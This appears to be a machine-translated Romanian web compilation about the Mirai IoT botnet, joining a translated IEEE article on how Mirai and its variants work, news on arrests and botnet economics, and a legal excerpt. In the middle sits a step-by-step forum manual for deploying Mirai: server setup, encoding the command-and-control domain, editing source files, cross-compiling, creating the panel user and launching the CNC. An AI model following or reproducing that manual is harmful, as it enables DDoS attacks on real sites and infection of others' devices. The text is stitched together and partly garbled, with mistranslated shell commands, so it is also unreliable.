De unde a venit Mirai? Înțelegem cum funcționează o rețea botnet de camere video. Rețelele botnet Mirai și Gafgyt IoT vizează sectorul corporativ. Ce se mai știe despre acest troian

Odată cu popularitatea și amploarea în creștere a Internetului lucrurilor, dispozitivele sale au început să fie folosite de atacatori ca platformă pentru organizarea celor mai puternice atacuri cibernetice. Severitatea și numărul incidentelor de securitate de mare profil care implică astfel de dispozitive au arătat că acestea reprezintă cea mai slabă verigă din lanțul de securitate al rețelelor moderne de calculatoare. Lăsați-l să plece putere de calcul a majorității subiectelor din Internetul lucrurilor este departe de capabilitățile unui PC, lipsa acestuia este compensată de numărul de dispozitive combinate într-un singur întreg. Toate sunt conectate în mod constant la rețea și adesea, lucrând în configurația din fabrică, devin o bucată delicioasă pentru biscuiți. Numărul mare, distribuția largă și securitatea slabă a dispozitivelor IoT au atras deja mulți atacatori care le folosesc în mod activ pentru a lansa atacuri DDoS.

„Viitorul” este deja aici

Un exemplu recent bine-cunoscut este botnet-ul Mirai (în japoneză pentru „viitor”. Notă. ed.), descoperit pentru prima dată în august 2016 de echipa de cercetare MalwareMustDie. Malware-ul în sine, precum și numeroasele sale variante și imitatori, au devenit sursele celor mai puternice atacuri DDoS din istoria industriei IT.

În septembrie 2016, site-ul consultantului de securitate informatică Brian Krebs a început să primească trafic cu o viteză de 620 Gb/s, ceea ce este cu ordine de mărime mai mare decât nivelul la care se blochează majoritatea site-urilor. Cam în același timp, un atac Mirai DDoS și mai puternic (1,1 Tbps) a lovit OVH, un furnizor francez de servicii de găzduire web și cloud. În curând a fost publicat codul sursă al malware-ului, după care atacatorii au început să închirieze botnet-uri bazate pe acesta, care conțineau până la 400.000 de dispozitive. Au urmat o serie de atacuri Mirai, dintre care cel mai notoriu, organizat împotriva furnizorului de servicii Dyn, în octombrie 2016 a dezactivat timp de câteva ore sute de site-uri, printre care Twitter, Netflix, Reddit și GitHub.

Mirai se răspândește de obicei prin infectarea mai întâi a camerelor web, DVR-urilor, routerelor etc. care rulează o versiune de BusyBox. Malware-ul descoperă apoi acreditările administrative ale altor dispozitive IoT pur și simplu prin forță brută, folosind un mic dicționar de perechi nume-parolă tipic pentru producătorii de dispozitive de rețea.

Ulterior, mutațiile Mirai au început să apară literalmente zilnic, iar faptul că au păstrat capacitatea de a se reproduce și de a provoca daune folosind aceleași metode ca și originalul indică o neglijare cronică a producătorilor de dispozitive IoT cu cele mai simple metode de protecție. În mod surprinzător, totuși, botnet-urile formate din astfel de dispozitive au primit puține cercetări, în ciuda pericolului ca atacurile din ce în ce mai sofisticate bazate pe acestea să aibă potențialul de a submina întreaga infrastructură a Internetului.

Cum funcționează Mirai

Mirai lansează un atac DDoS împotriva serverelor țintă, răspândindu-se activ prin dispozitive IoT cu o configurație nesigură.

Componentele principale

Rețeaua botne Mirai are patru componente principale. Un bot este un program malware care infectează dispozitivele și răspândește o „infecție” printre dispozitivele configurate greșit și apoi atacă serverul țintă atunci când primește comanda corespunzătoare de la botmaster - persoana care controlează roboții. Serverul de comandă și control oferă botmasterului o interfață pentru a verifica starea rețelei bot și a iniția noi atacuri DDoS. Comunicarea între elementele infrastructurii botnet se realizează de obicei prin intermediul rețelei Tor anonime. Încărcătorul distribuie fișiere executabile pentru toate platformele hardware (18 în total, inclusiv ARM, MIPS, x86 etc.) prin contact direct cu noi victime. Serverul de raportare menține o bază de date cu informații despre toate dispozitivele din botnet, iar gazdele nou infectate comunică de obicei direct cu acest server.

Schema de activitate și comunicare într-un botnet

Mirai scanează mai întâi porturile 23 și 2323 pentru adrese IP publice aleatorii. Sunt excluse unele adrese (probabil pentru a nu atrage atenția agențiilor guvernamentale) - de exemplu, cele aparținând Oficiului Poștal din SUA, Pentagonului, IANA, precum și General Electric și Hewlett-Packard. Pe fig. 1 prezintă principalele etape ale activității și schimbului de date într-o rețea botnet.

Etapa 1. Botul efectuează un atac de forță brută prin extragerea acreditărilor dispozitivelor IoT care nu au fost resetate din fabrică. Există 62 de perechi posibile nume utilizator/parolă în dicționarul Mirai.

Etapa 2. Găsind acreditări de lucru și utilizându-le pentru a avea acces la Linie de comanda sau GUI al dispozitivului, botul își comunică caracteristicile serverului de rapoarte printr-un alt port.

Etapa 3. Botmaster-ul verifică în mod regulat ținte potențiale și starea actuală a rețelei bot, comunicând cu serverul de rapoarte prin Tor.

Etapa 4. După ce a selectat dispozitivele vulnerabile pentru infectare, botmaster-ul emite comenzile corespunzătoare pentru descărcare cu toate detaliile necesare, inclusiv adrese IP și informații despre arhitectura hardware.

Etapa 5 Descărcătorul se conectează la dispozitivul vulnerabil și îl forțează să descarce și să ruleze executabilul malware corespunzător. De obicei, descărcarea se face folosind utilitarul GNU Wget folosind protocolul TFTP. Este de remarcat faptul că, odată cu lansarea malware-ului, acesta încearcă să se protejeze de concurenți prin blocarea porturilor prin care apare adesea infecția, inclusiv Telnet și SSH. În această etapă, instanța bot nou creată poate deja să comunice cu serverul de control și să primească comenzi de la acesta pentru a lansa un atac. Face acest lucru prin rezolvarea numelui de domeniu codificat în executabil (implicit în Mirai este cnc.changeme.com). Această metodă, folosită în locul accesului direct la adresa IP, permite botmasterului să schimbe adresele IP ale serverului de control fără a modifica fișierele binare și schimbul de informații suplimentare.

Etapa 6. Botmaster-ul instruiește toate instanțele botului să lanseze un atac împotriva serverului țintă, trecând parametrii corespunzători prin serverul de comandă și control, inclusiv tipul și durata atacului, precum și adresele IP ale serverului însuși și ale botului. instanțe.

Etapa 7. Boții încep să atace ținta folosind una dintre cele zece metode disponibile, inclusiv inundarea folosind protocoalele Generic Routing Encapsulation, TCP și HTTP.

Caracteristicile lui Mirai

Spre deosebire de alte programe malware similare, Mirai nu încearcă să evite detectarea. Aproape toate stadiile de infectare au trasaturi caracteristice care pot fi recunoscute prin simpla analiza a retelei: enumerarea anumitor acreditări prin anumite porturi; trimiterea de rapoarte personalizate; încărcarea binarelor specifice; mesagerie pentru a menține conexiunea; transmiterea comenzilor de control cu o structură caracteristică; absența aproape completă a elementelor aleatorii în traficul de atac.

Pe fig. Figura 2 arată modurile standard de comunicare între bootloader-ul Mirai și un dispozitiv IoT deja infectat, dar neatacat încă. Durata sesiunilor variază, dar tipurile și dimensiunile pachetelor, precum și secvența mesajelor, urmează modele care indică infectarea cu acest program malware.

variante Mirai

S-ar părea că publicația cod sursa Mirai și zgomotul relativ puternic al rețelei ar fi trebuit să ducă la apariția rapidă a mecanismelor eficiente de recunoaștere și protecție. Cu toate acestea, acest lucru nu s-a întâmplat: la doar două luni de la lansarea codului sursă, numărul instanțelor bot sa dublat, de la 213 mii la 493 mii, și au apărut un număr mare de soiuri ale acestuia. Chiar și la mai bine de un an de la descoperirea lui Mirai, roboții încă foloseau configurații slabe ale dispozitivelor de aceleași tipuri ca și inițial.

Cele mai multe infecții Mirai apar prin porturile TCP 23 sau 2323, dar în noiembrie 2016 au fost găsite tulpini de virus care accesează alte porturi, inclusiv 7547, pe care ISP-urile le folosesc pentru telecomandă routere client. În aceeași lună, una dintre aceste variante de Mirai a lăsat aproape un milion de abonați Deutsche Telekom fără acces la Web.

În februarie 2017, folosind varianta Mirai, a fost organizat un atac DDoS de 54 de ore împotriva unuia dintre colegiile americane. Luna următoare, a apărut o altă variantă, de data aceasta cu facilități de mining bitcoin încorporate, deși s-a estimat că utilizarea dispozitivelor IoT în acest scop era puțin probabil să aducă multe venituri.

În aprilie, activitatea a început pe Persirai, un alt botnet construit folosind baza de cod Mirai. Această rețea de zombi a fost descoperită de cercetătorii Trend Micro, care i-au dat un nume combinând cuvintele persană și Mirai - prima a fost aleasă pe baza presupusei origini iraniene a malware-ului. Încearcă să acceseze interfața de control a camerelor web ale anumitor producători prin Port TCP 81. Dacă are succes, routerul este pătruns utilizând vulnerabilitatea protocolului UPnP, iar apoi binare suplimentare sunt descărcate, lansate și eliminate. În loc să forțeze acreditările pentru a intra în interfața camerei, virusul folosește un defect zero-day pentru a prelua direct fișierul cu parole. Un atac DoS distribuit este efectuat prin inundare peste protocolul UDP. Potrivit estimărilor, existau aproximativ 120.000 de dispozitive pe Web care erau vulnerabile la Persirai.

Alte botnet-uri IoT

Bazându-se pe principii de baza Mirai, creatorii noului malware au început să folosească alte mecanisme, mai sofisticate, pentru a crește puterea și a masca activitatea rețelelor de zombi.

În august 2016, cercetătorii de la MalwareMustDie au raportat despre primul botnet bazat pe IoT, construit folosind limbajul de scripting Lua. Cea mai mare parte a armatei botnet era formată din modemuri de cablu cu procesoare ARM care rulau Linux. Malware-ul are funcții complexe - de exemplu, creează un canal de schimb de date criptat cu serverul de comandă și control și stabilește reguli speciale iptables pentru a proteja dispozitivele infectate de concurenți.

Rețeaua botnet Hajime, descoperită în octombrie 2016 de Rapidity Networks, folosește o metodă de infecție similară cu Mirai. Dar, în loc de o arhitectură centralizată, Hajime se bazează pe un sistem de comunicații distribuite, folosind protocolul BitTorrent Distributed Hash Tag (DHT) pentru a descoperi colegii (utilizatori de rețea de la egal la egal) și utilizează protocolul de transport uTorrent pentru a face schimb de date. Toate mesajele sunt criptate folosind protocolul RC4. Până acum, Hajime nu s-a arătat într-un mod negativ, dimpotrivă, elimină potențialele surse de vulnerabilități în dispozitivele IoT folosite de botnet-uri precum Mirai, în legătură cu care s-a sugerat că a fost creat de un fel de " Robin Hood”. Cu toate acestea, adevăratul scop al rețelei bot a rămas un mister.

Rețeaua botnet BrickerBot, care, la fel ca Mirai, infectează software-ul BusyBox, a fost descoperită de experții Radware în aprilie 2017. Folosind acreditările implicite setate în serviciul SSH, precum și configurații eronate și vulnerabilități cunoscute, malware-ul încearcă să lanseze atacuri de denial of service (PDoS) permanent împotriva dispozitivelor IoT, adică suficient de distructive pentru a forța reconfigurarea sau înlocuirea echipamentului. BrickerBot corupă firmware-ul dispozitivului, șterge fișierele de pe ele și modifică setările de rețea.

Lecții

Daunele masive cauzate de atacurile Mirai, variantele sale și botnet-urile similare au demonstrat în mod clar riscurile prezentate de dispozitivele IoT pentru World Wide Web. Astăzi, virușii destul de simpli sunt capabili să preia controlul asupra unor astfel de dispozitive și să creeze armate uriașe distructive de „zombi”. În același timp, atacatorii sunt atrași de simplitatea creșterii unei populații de roboți. Există cinci motive principale pentru care dispozitivele IoT sunt deosebit de benefice pentru crearea de rețele bot.

Activitate constantă, nestingherită. Spre deosebire de laptopuri și desktop-uri, care adesea se pornesc și se opresc, multe dispozitive IoT (cum ar fi camerele web și routerele Wi-Fi) funcționează non-stop și sunt adesea percepute de gazde ca dispozitive care nu pot fi susceptibile la infecții.
Lipsa de protectie.În graba lor de a intra pe piața IoT, mulți producători de dispozitive neglijează securitatea în favoarea confortului și ușurinței în utilizare.
Lipsa de control. Cele mai multe dispozitive IoT sunt folosite pe bază de „setare și uitare” - după configurare inițială administratorii de sistem le pot acorda atenție numai dacă încetează să funcționeze în mod regulat.
Trafic de atac impresionant. Dispozitivele IoT de astăzi sunt suficient de puternice și bine poziționate pentru a genera trafic de atac DDoS la fel de puternic ca desktop-urile de astăzi.
Interfețe de utilizator neinteractive sau minim interactive. Deoarece dispozitivele IoT necesită de obicei o intervenție minimă a utilizatorului, este probabil ca o infecție să rămână nedetectată. Dar chiar dacă se observă, utilizatorii nu sunt disponibili moduri simple eliminarea malware-ului, cu excepția înlocuirii fizice a dispozitivului.

Apariția atacurilor DDoS de către dispozitivele IoT a fost prezisă de mult, iar astăzi numărul variantelor și imitațiilor Mirai din ce în ce mai sofisticate crește într-un ritm alarmant. Un astfel de malware este de obicei capabil să opereze pe multe platforme și, fiind caracterizat printr-un consum redus de resurse, se poate mulțumi cu un minim memorie cu acces aleator. În plus, procedura de infectare este relativ simplă, făcând din orice dispozitiv vulnerabil un candidat pentru a fi transformat într-un zombi, chiar dacă este repornit frecvent. Majoritatea programelor malware IoT care există astăzi sunt ușor de detectat și analizat, dar noii roboti devin din ce în ce mai ascunși.

De obicei, cea mai mare parte a răspunderii pentru atacurile DDoS revine utilizatorilor înșiși și administratorilor de sistem care neglijează măsurile de precauție elementare. Cu toate acestea, în cazul rețelelor botnet IoT, întreaga responsabilitate revine producătorilor care produc produse slab protejate cu setări din fabrică. acces de la distanță. În plus, numai producătorii de dispozitive IoT au capacitatea de a furniza automat actualizări de marcă securitate, care v-ar permite să vă protejați de infecții. Practicile convenționale de securitate manuale, cum ar fi schimbările frecvente ale parolei, nu sunt posibile pentru dispozitivele IoT, deoarece comportamentul lor în rețea este autoreglabil. Prin urmare, IoT de astăzi necesită controale tehnice de securitate, precum și standarde robuste de securitate a dispozitivelor pe care toți furnizorii trebuie să le respecte.

Geoffrey Voas ( [email protected]) este IEEE Fellow.

Constantinos Kolias, Georgios Kambourakis, Angelos Stavrou, Jefrey Voas, DDoS în IoT: Mirai și alte rețele bot. IEEE Computer, iulie 2017, IEEE Computer Society. Toate drepturile rezervate. Retipărit cu permisiunea.

Nu voi face pipi prea mult, voi spune doar că software-ul funcționează, oprește site-urile cu un bang. Și acesta este primul manual rusesc pentru instalarea Mirai. „Prostia istorică”

Vom avea nevoie de două servere VPS KVM și un domeniu. Virtualizarea este KVM, OpenVZ până acum.
Pe un server vom instala rețeaua botnet în sine, pe al doilea vom scana roboții. (brută)
Am luat serverele aici - https://www.nforce.com/
Nu au fost probleme, nici interdicții.
Pentru cei care doresc doar să vadă cum este și ce, puteți lua servere de testare aici - https://adminvps.ru/
IMPORTANT. Serverele trebuie să fie bazate pe Debian 8 și să aibă cel puțin 1 GB de RAM.
Orice domeniu, nu contează.
Îmi pare rău, desigur, dar nu vă voi spune cum să atașați un domeniu la un VPS. Nu este greu, îți vei da seama singur.
Ne conectăm la serverul nostru prin PuTTY și începem.

# apt-get update -y
# apt-get upgrade -y
# apt-get install unzip gcc golang electric-fence screen sudo git -y
# apt-get install mysql-server -y
# apt-get install mysql-client -y
# apt-get install apache2 -y
Când instalați MySQL, va trebui să creați o parolă pentru a accesa MySQL pentru utilizatorul root. Vino cu o parolă normală, fără niciun „qwerty”
Notează-l undeva, tot vom avea nevoie.

# sudo apt-get install curl git mercurial make binutils bison gcc build-essential -y
#bash< <(curl -s -S -L https://raw.githubusercontent.com/moovweb/gvm/master/binscripts/gvm-installer)
# gvm install go1.4
# gvm folosește go1.4 [--default]
# gvm install go1.4 -B
# gvm folosește go1.4
# export GOROOT_BOOTSTRAP=$GOROOT
# gvm install go1.5
# gvm folosește go1.5
# gvm install go1.8
# gvm folosește go1.8

După instalarea tuturor utilităților, descărcați codul sursă al botului - și încărcați-l pe server. Cu comanda wget, sau pur și simplu prin programul WinSCP.
# dezarhivați Mirai-Source-Code-master.zip
# cd Mirai-Source-Code-Master/mirai/tools
# gcc enc.c -o enc
# ./enc șir vlmi.su (noi scriem domeniul, care este atașat serverului) și apăsăm Enter
Aici veți vedea următorul text -
XOR"ing 14 octeți de date...
\x41\x4C\x41\x0C\x41\x4A\x43\x4C\x45\x47\x4F\x47\x0C\x41\x4D\x4F\x22
14 - veți avea un alt număr aici, așa că nu vă faceți griji, totul este corect.
Copiați tot acest text.
Deschidem editorul nano prin editorul nano, sau prin WinSCP fișierul table.c aflat în folderul mirai/bot
Trebuie să vezi asta - https://prnt.sc/gcxa2m
Linia add_entry (TABLE_CNC_DOMAIN - schimbăm tot ce este între ghilimele în textul nostru pe care tocmai l-am copiat. În loc de „30" scriem numărul nostru, pe care tocmai l-am copiat. Facem același lucru cu linia add_entry (TABLE_SCAN_CB_DOMAIN
Salvați și închideți editorul.
Mergi mai departe.
Deschideți fișierul mirai/cnc/main.go cu editorul
O vedem - https://prnt.sc/gcxdtz
„127.0.0.1” se schimbă în „127.0.0.1:3306”
„parola” este schimbată în parola noastră MySQL care a fost introdusă mai devreme. "
Salvați fișierul și închideți editorul.
Doar copiați tot acest gunoi, nu vă voi spune de ce este nevoie -

# mkdir /etc/xcompile
# cd /etc/xcompile

# tar -jxf cross-compiler-armv4l.tar.bz2
# tar -jxf cross-compiler-i586.tar.bz2
# tar -jxf cross-compiler-m68k.tar.bz2
# tar -jxf cross-compiler-mips.tar.bz2
# tar -jxf cross-compiler-mipsel.tar.bz2
# tar -jxf cross-compiler-powerpc.tar.bz2
# tar -jxf cross-compiler-sh4.tar.bz2
# tar -jxf cross-compiler-sparc.tar.bz2
# tar -jxf cross-compiler-armv6l.tar.bz2

# mv cross-compiler-armv4l armv4l
# mv cross-compiler-i586 i586
# mv cross-compiler-m68k m68k
# mv cross-compiler-mips mips
# mv cross-compiler-mipsel mipsel
# mv cross-compiler-powerpc powerpc
# mv cross-compiler-sh4 sh4
# mv cross-compiler-sparc sparc
# mv cross-compiler-armv6l armv6l

# export PATH=$PATH:/etc/xcompile/armv4l/bin

# export PATH=$PATH:/etc/xcompile/i586/bin
# export PATH=$PATH:/etc/xcompile/m68k/bin
# export PATH=$PATH:/etc/xcompile/mips/bin
# export PATH=$PATH:/etc/xcompile/mipsel/bin
# export PATH=$PATH:/etc/xcompile/powerpc/bin
# export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
# export PATH=$PATH:/etc/xcompile/sh4/bin
# export PATH=$PATH:/etc/xcompile/sparc/bin
# export PATH=$PATH:/etc/xcompile/armv6l/bin

# export PATH=$PATH:/usr/local/go/bin
# export GOPATH=$HOME/Documente/go

# du-te la github.com/go-sql-driver/mysql
# du-te la github.com/mattn/go-shellwords
Al dracului.

# cd Mirai-Source-Code-master/mirai
# ./build.sh depanare telnet
# ./build.sh lansează telnet

# mv mirai* /var/www/html
# cd /var/www/html
# mkdir bins
#mv*bins/
#CD

Acum MySQL.
# mysql -u root -p
Aici vi se va cere o parolă. Introduceți parola pe care ați setat-o anterior.
# create database mirai;
#use mirai
Acum copiați tot textul de aici - lipiți https://pastebin.com/QVD48J8s și apăsați Enter.
Copiați textul de aici - https://pastebin.com/JwYSgE4v
În loc de anna-senpai, ne scriem datele de conectare. Orice. La fel și cu myawesomepassword. Vom avea nevoie de aceste date pentru a accesa panoul de control al botului.
Ar trebui să fie așa - INSERT INTO users VALUES (NULL, "pizdec", "zaebalsjapisatj", 0, 0, 0, 0, -1, 1, 30, "");
Copiați, lipiți, apăsați Enter.
Acum poți să ieși.
#Ieșire
Aproape totul.
# cd Mirai-Source-Code-master/mirai/release
# atinge prompt.txt
# ecran ./cnc
Ar trebui să vedeți MySQL DB deschis
Nu închideți această sesiune, deschideți una nouă.
http://prntscr.com/gcxunx în loc de vlmi.su scriem domeniul nostru și facem clic pe Deschidere.
Introduceți numele dvs. de utilizator și parola, în cazul meu este -
pizdec
zaebalsjapisatj
Totul, suntem în panoul de control al botului.

În esență, Mirai funcționează simplu: scanează internetul pentru dispozitive IoT care sunt vulnerabile la forța brută și hacking, accesibile prin telnet. Malware-ul infectează în primul rând camerele de supraveghere, DVR-urile și routerele și apoi continuă să se înmulțească ca un vierme.

Din atacurile DDoS efectuate recent de acest botnet și cel mai mare din Europa. Puterea de atac de vârf a atins 620 Gb/s și mai mult de 1 Tb/s. Pentru a obține astfel de rezultate, atacatorii au folosit inundații UDP, DNS și HTTP, precum și pachete GRE (Generic Routing Encapsulation), pe care experții le-au recunoscut ca fiind foarte neobișnuite.

Concluziile experților MalwareTech sunt în general de acord cu aceste observații. Deci, pe o perioadă de douăsprezece ore, cercetătorii au înregistrat aproximativ 72.000 de adrese IP unice și 4.000 de IP-uri noi au apărut în fiecare oră. Din aceasta, analiștii au concluzionat că dimensiunea rețelei bot este foarte modestă - doar aproximativ 120.000 de dispozitive pe zi. Și deși botnet-ul este mult mai mare și cifrele sunt de 1-1,5 milioane de roboți, nici cercetătorii MalwareTech, nici specialiștii Akamai nu sunt de acord cu acest lucru.

„Mirai, care a fost ignorat în mare măsură în trecut din cauza simplității atacurilor telnet, a devenit aproape subiectul principal de discuție în mass-media din întreaga lume săptămâna trecută, iar agențiile de aplicare a legii au declanșat investigații, cu sprijinul multor companii internaționale”. scriu cercetătorii. „Este foarte probabil ca atacurile DDoS puternice să devină mai frecvente acum, pe măsură ce hackerii găsesc dispozitive IoT din ce în ce mai vulnerabile sau încep să infecteze dispozitivele protejate NAT. Cu siguranță este timpul ca producătorii să nu mai lanseze dispozitive cu parole implicite globale și să treacă la eliberarea dispozitivelor cu parole generate aleatoriu în partea de jos a carcasei.”

Pe lângă raport, cercetătorii MalwareTech au atașat un videoclip care arată o hartă a infecțiilor Mirai (vezi mai jos). Tot pe site-ul cercetătorilor, puteți găsi o hartă interactivă a rețelei bot, care este actualizată în timp real.

Atacurile botnet Mirai asupra furnizorului american de DNS Dyn în 2016 au provocat o rezonanță largă și au atras atenția sporită asupra botnet-urilor. Cu toate acestea, în comparație cu modul în care infractorii cibernetici moderni folosesc astăzi rețelele bot, atacurile asupra lui Dyn pot părea niște farse copilărești. Infractorii au învățat rapid să folosească rețelele bot pentru a lansa programe malware sofisticate care le permit să creeze infrastructuri întregi de computere infectate și alte dispozitive activate pe internet pentru a genera profituri ilegale la scară masivă.

În ultimii ani, agențiile de aplicare a legii au făcut unele progrese în combaterea activităților criminale legate de botnet, dar până acum aceste eforturi cu siguranță nu sunt suficiente pentru a face o încălcare suficientă în botnet-urile conduse de infractorii cibernetici. Iată câteva exemple celebre:

Departamentul de Justiție al SUA a pus sub acuzare doi tineri pentru rolul lor în dezvoltarea și funcționarea rețelei botne Mirai: Paras Jha, 21 de ani, și Josiah White, 20 de ani. Aceștia sunt acuzați că au organizat și desfășurat atacuri DDoS asupra companiilor, iar apoi au cerut o răscumpărare pentru a le opri, precum și că au vândut „servicii” acestor companii pentru a preveni atacuri similare în viitor.
Autoritățile spaniole, în cadrul unei operațiuni transfrontaliere la cererea Statelor Unite, l-au arestat pe un rezident al Sankt-Petersburgului, Peter Levashov, cunoscut în cercurile infracționale cibernetice drept Peter Severa. A condus Kelihos, una dintre cele mai longevive rețele bot de pe Internet, despre care se estimează că a infectat aproximativ 100.000 de computere. Pe lângă extorcare, Petr Levashov a folosit activ Kelihos pentru a organiza mesaje spam, taxând 200-500 USD per milion de mesaje.
Anul trecut, doi adolescenți israelieni au fost arestați sub acuzația de organizare de atacuri DDoS pentru recompense. Cuplul a reușit să câștige aproximativ 600.000 de dolari și să efectueze aproximativ 150.000 de atacuri DDoS.

Botnet-urile sunt rețele de calculatoare formate dintr-un număr mare de calculatoare sau alte dispozitive conectate la Internet, pe care, fără știrea deținătorilor lor, se descarcă și se lansează software autonom - roboți. Interesant este că boții înșiși au fost dezvoltați inițial ca instrumente software pentru automatizarea sarcinilor repetitive și repetitive non-criminale. În mod ironic, unul dintre primii roboți de succes, cunoscut sub numele de Eggdrop și creat în 1993, a fost conceput pentru a controla și proteja canalele IRC (Internet Relay Chat) de încercările terților de a prelua controlul asupra acestora. Dar elementele criminale au învățat rapid să valorifice puterea rețelelor bot, folosindu-le ca sisteme globale, aproape automate, de profit.

În acest timp, malware-ul botnet a evoluat semnificativ și acum poate folosi o varietate de metode de atac care apar simultan în mai multe direcții. În plus, „economia botului”, din punctul de vedere al infractorilor cibernetici, arată extrem de atractiv. În primul rând, practic nu există costuri de infrastructură, deoarece computerele compromise și alte echipamente compatibile cu internet sunt folosite pentru a organiza o rețea de mașini infectate, desigur, fără știrea proprietarilor acestor dispozitive. Această libertate de investiții în infrastructură înseamnă că profiturile infractorilor vor fi practic egale cu veniturile lor din activități ilegale. Pe lângă posibilitatea de a folosi o astfel de infrastructură „profitabilă”, anonimatul este, de asemenea, extrem de important pentru infractorii cibernetici. Pentru a face acest lucru, aceștia folosesc în principal criptomonede „nerezonabile”, cum ar fi Bitcoin, atunci când cer o răscumpărare. Din aceste motive, rețelele bot au devenit platforma preferată pentru criminalitatea cibernetică.

Din punctul de vedere al implementării diverselor modele de afaceri, botnet-urile sunt o platformă excelentă pentru lansarea diferitelor funcționalități rău intenționate care aduc venituri ilegale infractorilor cibernetici:

Distribuție rapidă și pe scară largă a e-mailurilor care conțin ransomware care solicită o răscumpărare.
Ca platformă pentru lichidarea numărului de clicuri pe link.
Deschiderea serverelor proxy pentru acces anonim la Internet.
Implementarea încercărilor de a pirata alte sisteme de internet prin căutare prin forță brută (sau „forță brută”).
Efectuarea de mailinguri în masă de e-mailuri și găzduirea de site-uri false în caz de phishing la scară largă.
Retragerea cheilor de CD sau a altor date de licență pentru software.
Furtul de informații personale de identificare.
Obținerea informațiilor despre cardul de credit și alte conturi bancare, inclusiv coduri PIN sau parole „secrete”.
Instalați keylogger pentru a captura toate datele pe care utilizatorul le introduce în sistem.

Cum se creează un botnet?

Un factor important care contribuie la popularitatea utilizării botnetului în rândul infractorilor cibernetici de astăzi este relativa ușurință cu care diferitele componente ale malware-ului botnet pot fi asamblate, modificate și îmbunătățite. Oportunitatea de a crea rapid o rețea botnet a apărut în 2015, când codurile sursă ale LizardStresser, un set de instrumente pentru desfășurarea atacurilor DDoS, creat de binecunoscutul grup de hackeri Lizard Squad, au devenit disponibile publicului. Astăzi, orice școlar poate descărca o rețea botnet pentru a efectua atacuri DDOS (ceea ce deja face, conform publicațiilor de știri din întreaga lume).

Ușor de descărcat și ușor de utilizat, codul LizardStresser conține câteva metode sofisticate pentru efectuarea atacurilor DDoS: menține deschise conexiunile TCP, trimite șiruri nedorite aleatorii către un port TCP sau port UDP sau retrimite pachetele TCP cu valorile de semnalizare date. Malware-ul a inclus, de asemenea, un mecanism de lansare aleatorie a comenzilor shell, care este extrem de util pentru descărcarea versiunilor actualizate de LizardStresser cu comenzi noi și o listă actualizată de dispozitive monitorizate, precum și pentru instalarea altor programe malware pe dispozitivul infectat. De atunci, au fost publicate codurile sursă ale altor programe malware pentru organizarea și controlul rețelelor bot, inclusiv, în special, software-ul Mirai, ceea ce a redus dramatic „bariera high-tech” în calea activității criminale, crescând în același timp oportunitățile pentru profit și flexibilitate în utilizarea botnet-urilor.

Cum Internetul lucrurilor (IoT) a devenit un Klondike pentru crearea de rețele bot

În ceea ce privește numărul de dispozitive infectate și traficul pe care îl generează în timpul atacurilor, utilizarea masivă a dispozitivelor IoT nesecurizate a avut un efect exploziv, ducând la apariția botnet-urilor la o scară fără precedent. Deci, de exemplu, în vara anului 2016, înainte și imediat în timpul Jocurilor Olimpice de la Rio de Janeiro, una dintre rețelele bot create pe baza codului programului LizardStresser a folosit în principal aproximativ 10 mii de dispozitive IoT infectate (în primul rând camere web). să efectueze atacuri DDoS multiple și susținute cu o putere susținută care depășește 400 Gb/s, atingând un vârf de 540 Gb/s. De asemenea, menționăm că, conform estimărilor, botnet-ul original Mirai a fost capabil să compromită aproximativ 500 de mii de dispozitive IoT din întreaga lume.

Deși mulți furnizori au făcut unele modificări de la aceste atacuri, majoritatea dispozitivelor IoT încă sunt livrate cu setări implicite de nume de utilizator și parolă sau cu vulnerabilități de securitate cunoscute. În plus, pentru a economisi timp și bani, unii producători dublează periodic hardware-ul și software-ul folosit pentru diferite clase de dispozitive. Ca rezultat, parolele implicite utilizate pentru a controla dispozitivul original pot fi aplicate la multe dispozitive complet diferite. Astfel, miliarde de dispozitive IoT nesecurizate sunt deja implementate. Și, în ciuda faptului că creșterea prevăzută a numărului acestora a încetinit (deși ușor), creșterea așteptată a flotei globale de dispozitive IoT „potențial periculoase” în viitorul apropiat nu poate decât să șocheze (vezi graficul de mai jos).

Multe dispozitive IoT sunt excelente pentru utilizare neautorizată ca parte a rețelelor botnet criminale, deoarece:

În cea mai mare parte, acestea sunt neadministrate, cu alte cuvinte, funcționează fără control adecvat din partea administratorului de sistem, ceea ce face ca utilizarea lor ca proxy anonimi să fie extrem de eficientă.
Ele sunt de obicei online 24x7, ceea ce înseamnă că sunt disponibile pentru atacuri în orice moment și, de regulă, fără restricții de lățime de bandă sau filtrare a traficului.
Ei folosesc adesea o versiune redusă a sistemului de operare bazată pe familia Linux. Și malware-ul botnet poate fi compilat cu ușurință pentru arhitecturi utilizate pe scară largă, în principal ARM/MIPS/x86.
Un sistem de operare redus înseamnă automat mai puține funcții de securitate, inclusiv raportare, astfel încât majoritatea amenințărilor trec neobservate de proprietarii acestor dispozitive.

Iată un alt exemplu recent care va ajuta la înțelegerea puterii pe care o pot avea infrastructurile criminale moderne de botnet: în noiembrie 2017, botnet-ul Necurs a trimis o nouă tulpină a virusului ransomware Scarab. În urma campaniei în masă, au fost trimise aproximativ 12,5 milioane de e-mailuri infectate, adică rata de distribuție a fost de peste 2 milioane de e-mailuri pe oră. Apropo, aceeași rețea botnet a fost văzută răspândind troieni bancare Dridex și Trickbot, precum și viruși ransomware Locky și Jans.

concluzii

Disponibilitatea ridicată și ușurința de utilizare a malware-urilor botnet mai sofisticate și flexibile din ultimii ani, împreună cu o creștere semnificativă a numărului de dispozitive IoT nesecurizate, au făcut din botnet-urile criminale o componentă cheie a economiei digitale subterane în creștere. Această economie are piețe pentru date obținute în mod ilicit, acțiuni rău intenționate împotriva unor ținte specifice în cadrul furnizării de servicii pentru închiriere și chiar pentru propria sa monedă. Și toate previziunile analiștilor și experților în securitate sună extrem de dezamăgitor - în viitorul apropiat, situația cu utilizarea abuzivă a botnet-urilor pentru profituri ilegale nu va face decât să se agraveze.

Etern paranoic, Anton Kociukov.

Vezi si:

Săptămâna trecută, sursele componentelor rețelei botne Mirai, care a fost folosită în atacuri DDoS record cu o capacitate de până la 1 Tb/s, s-au scurs în rețea.

Artă. 273 din Codul penal al Federației Ruse. Crearea, utilizarea și distribuirea de programe de calculator rău intenționate

1. Crearea, distribuirea sau utilizarea programelor de calculator sau a altor informații informatice, destinate cu bună știință la distrugerea, blocarea, modificarea, copierea informațiilor informatice sau neutralizarea mijloacelor de protecție a informațiilor informatice, –

